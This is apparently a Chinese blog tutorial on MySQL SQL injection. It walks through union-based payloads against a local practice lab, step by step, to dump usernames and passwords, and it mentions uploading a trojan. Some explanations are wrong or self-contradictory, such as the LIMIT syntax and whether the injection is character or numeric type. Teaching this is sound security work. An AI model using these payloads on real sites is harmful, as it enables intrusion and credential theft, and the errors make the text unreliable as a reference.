MYSQL注入

SQL注入的几张表:

一、information_schema库:

  1、在mysql5.0版本后,默认数据库存放在这个数据库中,该库中常用的三个表schemata、tables、columns

  2、schemata表存储的是该用户创建的所有数据库中的库名,记录数据库的字段名为schema_name

  3、tables表存储该用户创建的所有数据库名和表明,库名和表明分别为table_schema,table_name

  4、columns存储改用户创建的所有数据库的库名、表明、字段名,分别为table_schema,table_name,columns_name

二、数据库查询语句

  格式:

    需查询的值 A=select 所属字段名 A from 所属表名 where 对应字段名 B=值B

三、limit的用法

  格式 limit n:m,其中n指的是记录开始的位置,从m=0开始,表示第一条记录,n是指取几条记录

四、常用的几个函数

  version():当前mysql版本

  database():当前使用的数据

  user():当前mysql的用户

五、注释

 1、#

 2、-- + 空格

 3、/**/   内联注释

 4、/*!*/  强制内联注释

注:url里不能用#号   

 

六、探测方法

 1、注入探测:

    自动方式:使用web漏洞扫描工具,发现注入点;

    手工方式:手工构造测试语句发现注入点;

    手工判断三步骤:

    数值型:

       and 1=1  true

       and 1=2   false

    字符型:

      ‘ and 1=1 --+  true

      ‘ and 1=2 --+  true or false

  2、信息获取

    环境信息:数据库类型,数据库版本,用户信息等

    数据库信息:数据库名称,数据库表,字段,字段内容

  3、获取权限

    获取操作权限,数据库执行shell,上传木马

   注:只要是带有参数的动态页面,都会存在注入的风险

 

七、Union注入攻击及代码分析

举例:

联合注入实现
http://127.0.0.1/sqli/Less/?id=1
第一步:判断是否存在sql注入漏洞
1、、http://127.0.0.1/sqli/Less-1/?id=1‘ 错误
2、、http://127.0.0.1/sqli/Less-1/?id=1 and 1=1 正常
3、http://127.0.0.1/sqli/Less-1/?id=1 and 1=2 正常
返回正常这里可以判断是字符型,那么构造字符型注入的payload
1、http://127.0.0.1/sqli/Less-1/?id=1‘ and 1=1 --+ 正常
2、http://127.0.0.1/sqli/Less-1/?id=1‘ and 1=2 --+ 异常
从而可以判断此处存在sql注入漏洞,切入漏洞类型为数值型

第二步:判断数据表字段数
order by 1-99
http://127.0.0.1/sqli/Less-1/?id=0‘ order by 1 --+

第三步:判断查询输出的位置
http://127.0.0.1/sqli/Less-1/?id=0‘ union select 1,2,3 --+

第四步:脱裤,报数据库名 seccurity --
http://127.0.0.1/sqli/Less-1/?id=1‘ union select 1,2,database() --+

第五步:报表名  users
http://127.0.0.1/sqli/Less-1/?id=0‘ union select 1,2,
(select group_concat(table_name) from information_schema.tables
where table_schema=‘security‘) --+

第六步:报字段名  id,username,password
http://127.0.0.1/sqli/Less-1/?id=0‘ union select 1,2,
(select group_concat(column_name) from information_schema.columns
where table_schema=‘security‘ and table_name=‘users‘) --+

第七步:报数据
http://127.0.0.1/sqli/Less-1/?id=0‘ union select 1,2,
(select group_concat(id,0x3a,username,0x3a,password) from security.users) --+

 

 

 

 

 

 

 

 

 

      

  

 

MYSQL注入

上一篇:sql 查询被锁表id 和导致锁表的语句


下一篇:设置 MySQL 的时区